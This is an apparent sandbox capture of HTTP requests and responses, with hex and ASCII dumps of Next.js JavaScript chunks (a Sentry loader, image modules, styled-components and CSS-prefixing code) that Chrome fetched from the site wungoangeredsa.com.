                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6f 77 2e 53 65 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2e 63 61 70 74 75 72 65 45 78 63 65 70 74 69 6f 6e 28 74 29 29 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 6e 74 72 79 4f 6e 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 28 29 7d 7d 29 2c 5b 5d 29 2c 28 30 2c 6e 2e 74 5a 29 28 69 28 29 2c 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 62 72 6f 77 73 65 72 2e 73 65 6e 74 72 79 2d 63 64 6e 2e 63 6f 6d 2f 37 2e 31 30 38 2e 30 2f 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 69 6e 74 65 67 72 69 74 79 3a 22 73 68 61 33 38 34 2d 2f 34 4c 31 39 4a 49 62 33 76 36 61 72 7a 77 68 37 48 41 69
                                                                                                          Data Ascii: ow.Sentry)||void 0===r||r.captureException(t))},c=function(){return(0,a.useEffect)((function(){window.sentryOnLoad=function(){return u()}}),[]),(0,n.tZ)(i(),{src:"https://browser.sentry-cdn.com/7.108.0/bundle.min.js",integrity:"sha384-/4L19JIb3v6arzwh7HAi
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 63 6f 67 6e 69 74 6f 3d 22 73 65 74 49 73 49 6e 63 6f 67 6e 69 74 6f 22 7d 28 6e 7c 7c 28 6e 3d 7b 7d 29 29 7d 2c 31 39 34 39 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 72 2c 7b 69 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 62 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 36 37 35 33 29 2c 6f 3d 74 28 31 32 31 33 39 29 2c 69 3d 74 28 37 30 38 36 35 29 2c 61 3d 74 28 39 36 36 37 30 29 2c 73 3d 74 28 35 30 39 33 30 29 2c 75 3d 74 28 39 35 37 39 38 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 73 77 69 74 63 68 28 72 2e 74 79 70 65 29 7b 63 61 73 65 20 75 2e 4b 2e 73 65 74 41 64 65 78 3a 76 61 72 20 74 3d 72
                                                                                                          Data Ascii: cognito="setIsIncognito"}(n||(n={}))},19495:function(e,r,t){"use strict";t.d(r,{iz:function(){return f},bp:function(){return v}});var n=t(56753),o=t(12139),i=t(70865),a=t(96670),s=t(50930),u=t(95798),c=function(e,r){switch(r.type){case u.K.setAdex:var t=r


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.450080104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/40ab15743262ea54-1736072686539.eaaf74440aba84a2.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-98da"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41600ad24238-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 37 64 63 31 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 37 30 31 2c 37 37 31 38 35 2c 36 32 38 31 31 2c 39 30 38 34 34 2c 39 31 37 30 37 2c 39 36 31 31 2c 31 38 32 2c 31 31 30 38 35 2c 36 39 31 34 33 2c 39 36 39 34 34 2c 37 32 35 33 30 2c 36 36 35 35 33 2c 34 35 37 30 37 2c 32 34 36 34 2c 31 32 38 35 2c 32 38 37 39 36 5d 2c 7b 37 37 31 38 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 63 6f 63 61 2d 63 6f 6c 61 2d 70 61 63 6b 2d 32 2e 34 31 36 62
                                                                                                          Data Ascii: 7dc1(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[13701,77185,62811,90844,91707,9611,182,11085,69143,96944,72530,66553,45707,2464,1285,28796],{77185:function(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/coca-cola-pack-2.416b
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 64 6f 6c 6c 61 72 73 2d 62 6f 79 2e 33 33 65 30 36 61 32 61 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 31 35 35 2c 77 69 64 74 68 3a 32 30 37 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6d 41 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 46 51 41 41 41 44 77 41 51 43 64 41 53 6f 49 41 41 59 41 41 6b 41 34 4a 59 77 43 64 41 44 30 57 43 37 68 39 51 41 41 2f 75 62 39 67 55 4c 4e 77 62 48 32 37 48 58 6e 37 4c 57 66 31 32 77 54 73 46 70 72 6a 52 48 77 59 37 4e 44 78 76 4c 44 4d 71 2b 2b
                                                                                                          Data Ascii: ion(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/dollars-boy.33e06a2a.webp",height:155,width:207,blurDataURL:"data:image/webp;base64,UklGRmAAAABXRUJQVlA4IFQAAADwAQCdASoIAAYAAkA4JYwCdAD0WC7h9QAA/ub9gULNwbH27HXn7LWf12wTsFprjRHwY7NDxvLDMq++
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 41 34 49 44 77 41 41 41 44 51 41 51 43 64 41 53 6f 49 41 41 51 41 41 6b 41 34 4a 5a 51 43 64 41 44 30 6a 4a 36 6f 51 41 44 2b 71 30 54 38 61 2f 4b 53 6e 78 32 63 2f 4f 50 31 39 76 79 79 45 53 62 41 62 32 48 41 6a 45 53 35 51 7a 6a 36 56 6b 5a 43 6a 57 4f 41 41 41 41 3d 22 2c 62 6c 75 72 57 69 64 74 68 3a 38 2c 62 6c 75 72 48 65 69 67 68 74 3a 34 7d 7d 2c 36 39 31 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 67 69 72 6c 2d 67 6c 61 73 73 65 73 2e 35 36 31 62 35 64 63 63 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 38 30 2c 77 69 64 74 68 3a 31 39 30 2c 62 6c 75 72 44 61 74 61 55 52
                                                                                                          Data Ascii: A4IDwAAADQAQCdASoIAAQAAkA4JZQCdAD0jJ6oQAD+q0T8a/KSnx2c/OP19vyyESbAb2HAjES5Qzj6VkZCjWOAAAA=",blurWidth:8,blurHeight:4}},69143:function(e,n,t){"use strict";t.r(n),n.default={src:"/_next/static/media/girl-glasses.561b5dcc.webp",height:80,width:190,blurDataUR
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 64 74 68 3a 32 30 30 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6f 41 41 41 41 42 58 52 55 4a 51 56 6c 41 34 57 41 6f 41 41 41 41 51 41 41 41 41 42 51 41 41 42 77 41 41 51 55 78 51 53 42 4d 41 41 41 41 42 44 2f 44 2b 2f 34 69 49 49 42 42 49 4d 74 76 66 61 34 69 49 2f 6f 63 48 41 46 5a 51 4f 43 42 47 41 41 41 41 38 41 45 41 6e 51 45 71 42 67 41 49 41 41 4a 41 4f 43 57 49 41 6e 51 42 46 4b 43 55 53 30 57 41 41 50 37 43 6e 71 76 65 52 54 56 48 6f 46 61 4d 36 44 4a 4a 4d 2b 68 77 4a 6e 6e 72 2b 36 75 47 31 6a 4b 38 70 78 35 6c 6d 75 31 30 38 48 47 77 67 63 43 57 59 72 7a 66 6b 65 41 41 41 41 3d 3d 22 2c 62 6c 75 72 57 69 64 74 68 3a 36 2c 62 6c 75 72 48 65 69 67 68 74 3a 38
                                                                                                          Data Ascii: idth:200,blurDataURL:"data:image/webp;base64,UklGRoAAAABXRUJQVlA4WAoAAAAQAAAABQAABwAAQUxQSBMAAAABD/D+/4iIIBBIMtvfa4iI/ocHAFZQOCBGAAAA8AEAnQEqBgAIAAJAOCWIAnQBFKCUS0WAAP7CnqveRTVHoFaM6DJJM+hwJnnr+6uG1jK8px5lmu108HGwgcCWYrzfkeAAAA==",blurWidth:6,blurHeight:8
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 72 69 63 74 22 3b 74 2e 72 28 6e 29 2c 6e 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 65 67 61 70 68 6f 6e 65 2e 61 62 37 38 34 61 63 64 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 33 38 2c 77 69 64 74 68 3a 34 38 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6e 59 41 41 41 42 58 52 55 4a 51 56 6c 41 34 57 41 6f 41 41 41 41 51 41 41 41 41 42 77 41 41 42 51 41 41 51 55 78 51 53 44 45 41 41 41 41 41 41 41 41 41 41 41 41 70 63 51 41 41 4d 30 46 46 65 75 37 4b 41 43 6a 39 2f 2f 2f 2f 2f 38 6f 41 4a 2f 33 2f 2f 2f 2f 2f 79 67 41 41 4a 73 2b 4b 63 4f 76 4b 41 41 41 41 57 6c 77 41 4b 47 77 41 41 46 5a 51 4f 43 41 65 41 41
                                                                                                          Data Ascii: rict";t.r(n),n.default={src:"/_next/static/media/megaphone.ab784acd.webp",height:38,width:48,blurDataURL:"data:image/webp;base64,UklGRnYAAABXRUJQVlA4WAoAAAAQAAAABwAABQAAQUxQSDEAAAAAAAAAAAApcQAAM0FFeu7KACj9/////8oAJ/3/////ygAAJs+KcOvKAAAAWlwAKGwAAFZQOCAeAA
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 74 2e 68 65 69 67 68 74 7d 29 2c 28 30 2c 69 2e 5a 29 28 72 2c 6f 2e 46 41 4d 49 4c 59 2c 7b 73 72 63 3a 6c 2e 64 65 66 61 75 6c 74 2e 73 72 63 2c 77 69 64 74 68 3a 6c 2e 64 65 66 61 75 6c 74 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 6c 2e 64 65 66 61 75 6c 74 2e 68 65 69 67 68 74 7d 29 2c 28 30 2c 69 2e 5a 29 28 72 2c 6f 2e 46 41 4d 49 4c 59 5f 53 48 4f 50 2c 7b 73 72 63 3a 64 2e 64 65 66 61 75 6c 74 2e 73 72 63 2c 77 69 64 74 68 3a 64 2e 64 65 66 61 75 6c 74 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 64 2e 64 65 66 61 75 6c 74 2e 68 65 69 67 68 74 7d 29 2c 28 30 2c 69 2e 5a 29 28 72 2c 6f 2e 43 4f 43 41 5f 43 4f 4c 41 5f 32 2c 7b 73 72 63 3a 73 2e 64 65 66 61 75 6c 74 2e 73 72 63 2c 77 69 64 74 68 3a 73 2e 64 65 66 61 75 6c 74 2e 77 69 64 74 68 2c 68 65
                                                                                                          Data Ascii: t.height}),(0,i.Z)(r,o.FAMILY,{src:l.default.src,width:l.default.width,height:l.default.height}),(0,i.Z)(r,o.FAMILY_SHOP,{src:d.default.src,width:d.default.width,height:d.default.height}),(0,i.Z)(r,o.COCA_COLA_2,{src:s.default.src,width:s.default.width,he
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6e 22 5d 29 3b 72 65 74 75 72 6e 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 77 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 22 2c 22 3b 5c 6e 20 20 70 61 64 64 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 66 6c 65 78 3a 20 31 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 62 28 29
                                                                                                          Data Ascii: n"]);return A=function(){return e},e}function w(){var e=(0,d.Z)(["\n background: ",";\n padding: ",";\n border-radius: ",";\n"]);return w=function(){return e},e}function v(){var e=(0,d.Z)(["\n flex: 1;\n"]);return v=function(){return e},e}function b()
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 2c 22 3b 5c 6e 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 22 2c 22 3b 5c 6e 20 20 67 61 70 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 5a 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 77 69 64 74 68 3a 20 22 2c 22 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 5a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 76 61 72 20 65 3d 28 30 2c 64 2e 5a 29 28 5b 22 5c 6e 20 20 63 6f 6c 6f 72 3a 20 23 38 38 38 3b 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 5c 6e 20 20 74 65 78 74 2d 64 65 63 6f
                                                                                                          Data Ascii: ,";\n justify-content: ",";\n gap: ",";\n"]);return y=function(){return e},e}function Z(){var e=(0,d.Z)(["\n width: ",";\n margin: ",";\n"]);return Z=function(){return e},e}function C(){var e=(0,d.Z)(["\n color: #888;\n font-size: 12px;\n text-deco
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 64 20 30 3a 6e 2e 70 61 64 64 69 6e 67 29 7c 7c 22 31 30 70 78 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 74 68 65 6d 65 2e 63 6f 6d 6d 65 6e 74 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 67 61 70 29 7c 7c 22 30 2e 36 72 65 6d 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 74 68 65 6d 65 2e 63 6f 6d 6d 65 6e 74 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 70 61 64 64 69 6e 67 4d 65 64 69 61 37 36 38 7d 29 29 2c 49 3d 6c 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 65 35 36 32 62
                                                                                                          Data Ascii: d 0:n.padding)||"10px"}),(function(e){var n;return(null===(n=e.theme.comments)||void 0===n?void 0:n.gap)||"0.6rem"}),(function(e){var n;return null===(n=e.theme.comments)||void 0===n?void 0:n.paddingMedia768})),I=l.ZP.div.withConfig({componentId:"sc-e562b
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6c 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 65 35 36 32 62 32 36 65 2d 33 22 7d 29 28 76 28 29 29 2c 55 3d 6c 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 65 35 36 32 62 32 36 65 2d 34 22 7d 29 28 62 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 74 68 65 6d 65 2e 63 6f 6d 6d 65 6e 74 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 7c 7c 6e 75 6c 6c 3d 3d 3d 28 74 3d 6e 2e 61 75 74 68 6f 72 4e 61 6d 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 63 6f 6c 6f 72 29 7c 7c 22 23 30 30 30 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                          Data Ascii: l.ZP.div.withConfig({componentId:"sc-e562b26e-3"})(v()),U=l.ZP.div.withConfig({componentId:"sc-e562b26e-4"})(b(),(function(e){var n,t;return(null===(n=e.theme.comments)||void 0===n||null===(t=n.authorName)||void 0===t?void 0:t.color)||"#000"}),(function(e


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.450081104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/3cacc58ea516fe6f-1736072686539.4d666b3ce7dcd66f.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-7553"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41601f39187d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 37 35 35 33 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 31 36 35 38 5d 2c 7b 38 38 36 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 6f 3d 72 3f 72 2e 63 61 6c 6c 28 6e 2c 65 2c 74 29 3a 76 6f 69 64 20 30 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 21 21 6f 3b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 21 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 73 3d
                                                                                                          Data Ascii: 7553(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[81658],{88665:function(e){e.exports=function(e,t,r,n){var o=r?r.call(n,e,t):void 0;if(void 0!==o)return!!o;if(e===t)return!0;if("object"!==typeof e||!e||"object"!==typeof t||!t)return!1;var s=
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 5b 6f 5d 3d 74 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 72 29 7b 69 66 28 72 7c 7c 32 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 6e 2c 6f 3d 30 2c 73 3d 74 2e 6c 65 6e 67 74 68 3b 6f 3c 73 3b 6f 2b 2b 29 21 6e 26 26 6f 20 69 6e 20 74 7c 7c 28 6e 7c 7c 28 6e 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 2c 30 2c 6f 29 29 2c 6e 5b 6f 5d 3d 74 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 6e 7c 7c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 29 7d 4f 62 6a
                                                                                                          Data Ascii: [o]=t[o]);return e},n.apply(this,arguments)};Object.create;function o(e,t,r){if(r||2===arguments.length)for(var n,o=0,s=t.length;o<s;o++)!n&&o in t||(n||(n=Array.prototype.slice.call(t,0,o)),n[o]=t[o]);return e.concat(n||Array.prototype.slice.call(t))}Obj
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 49 28 6a 2c 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 39 3a 63 61 73 65 20 31 30 3a 63 61 73 65 20 31 33 3a 63 61 73 65 20 33 32 3a 72 65 74 75 72 6e 20 35 3b 63 61 73 65 20 33 33 3a 63 61 73 65 20 34 33 3a 63 61 73 65 20 34 34 3a 63 61 73 65 20 34 37 3a 63 61 73 65 20 36 32 3a 63 61 73 65 20 36 34 3a 63 61 73 65 20 31 32 36 3a 63 61 73 65 20 35 39 3a 63 61 73 65 20 31 32 33 3a 63 61 73 65 20 31 32 35 3a 72 65 74 75 72 6e 20 34 3b 63 61 73 65 20 35 38 3a 72 65 74 75 72 6e 20 33 3b 63 61 73 65 20 33 34 3a 63 61 73 65 20 33 39 3a 63 61 73 65 20 34 30 3a 63 61 73 65 20 39 31 3a 72 65 74 75 72 6e 20 32 3b 63 61 73 65 20 34 31 3a 63 61 73 65
                                                                                                          Data Ascii: (e,t){return I(j,e,t)}function L(e){switch(e){case 0:case 9:case 10:case 13:case 32:return 5;case 33:case 43:case 44:case 47:case 62:case 64:case 126:case 59:case 123:case 125:return 4;case 58:return 3;case 34:case 39:case 40:case 91:return 2;case 41:case
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 7b 63 61 73 65 20 35 31 30 33 3a 72 65 74 75 72 6e 20 6c 2b 22 70 72 69 6e 74 2d 22 2b 65 2b 65 3b 63 61 73 65 20 35 37 33 37 3a 63 61 73 65 20 34 32 30 31 3a 63 61 73 65 20 33 31 37 37 3a 63 61 73 65 20 33 34 33 33 3a 63 61 73 65 20 31 36 34 31 3a 63 61 73 65 20 34 34 35 37 3a 63 61 73 65 20 32 39 32 31 3a 63 61 73 65 20 35 35 37 32 3a 63 61 73 65 20 36 33 35 36 3a 63 61 73 65 20 35 38 34 34 3a 63 61 73 65 20 33 31 39 31 3a 63 61 73 65 20 36 36 34 35 3a 63 61 73 65 20 33 30 30 35 3a 63 61 73 65 20 36 33 39 31 3a 63 61 73 65 20 35 38 37 39 3a 63 61 73 65 20 35 36 32 33 3a 63 61 73 65 20 36 31 33 35 3a 63 61 73 65 20 34 35 39 39 3a 63 61 73 65 20 34 38 35 35 3a 63 61 73 65 20 34 32 31 35 3a 63 61 73 65 20 36 33 38 39 3a 63 61 73 65 20 35 31 30 39 3a 63 61
                                                                                                          Data Ascii: {case 5103:return l+"print-"+e+e;case 5737:case 4201:case 3177:case 3433:case 1641:case 4457:case 2921:case 5572:case 6356:case 5844:case 3191:case 6645:case 3005:case 6391:case 5879:case 5623:case 6135:case 4599:case 4855:case 4215:case 6389:case 5109:ca
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 29 2f 2c 22 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 24 33 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 24 33 22 29 2c 2f 73 2e 2b 2d 62 5b 5e 3b 5d 2b 2f 2c 22 6a 75 73 74 69 66 79 22 29 2b 6c 2b 65 2b 65 3b 63 61 73 65 20 34 32 30 30 3a 69 66 28 21 53 28 65 2c 2f 66 6c 65 78 2d 7c 62 61 73 65 6c 69 6e 65 2f 29 29 72 65 74 75 72 6e 20 63 2b 22 67 72 69 64 2d 63 6f 6c 75 6d 6e 2d 61 6c 69 67 6e 22 2b 49 28 65 2c 74 29 2b 65 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 35 39 32 3a 63 61 73 65 20 33 33 36 30 3a 72 65 74 75 72 6e 20 63 2b 62 28 65 2c 22 74 65 6d 70 6c 61 74 65 2d 22 2c 22 22 29 2b 65 3b 63 61 73 65 20 34 33 38 34 3a 63 61 73 65 20 33 36 31 36 3a 72 65 74 75 72 6e 20 72 26 26 72 2e 73 6f 6d 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b
                                                                                                          Data Ascii: )/,"-webkit-box-pack:$3-ms-flex-pack:$3"),/s.+-b[^;]+/,"justify")+l+e+e;case 4200:if(!S(e,/flex-|baseline/))return c+"grid-column-align"+I(e,t)+e;break;case 2592:case 3360:return c+b(e,"template-","")+e;case 4384:case 3616:return r&&r.some((function(e,r){
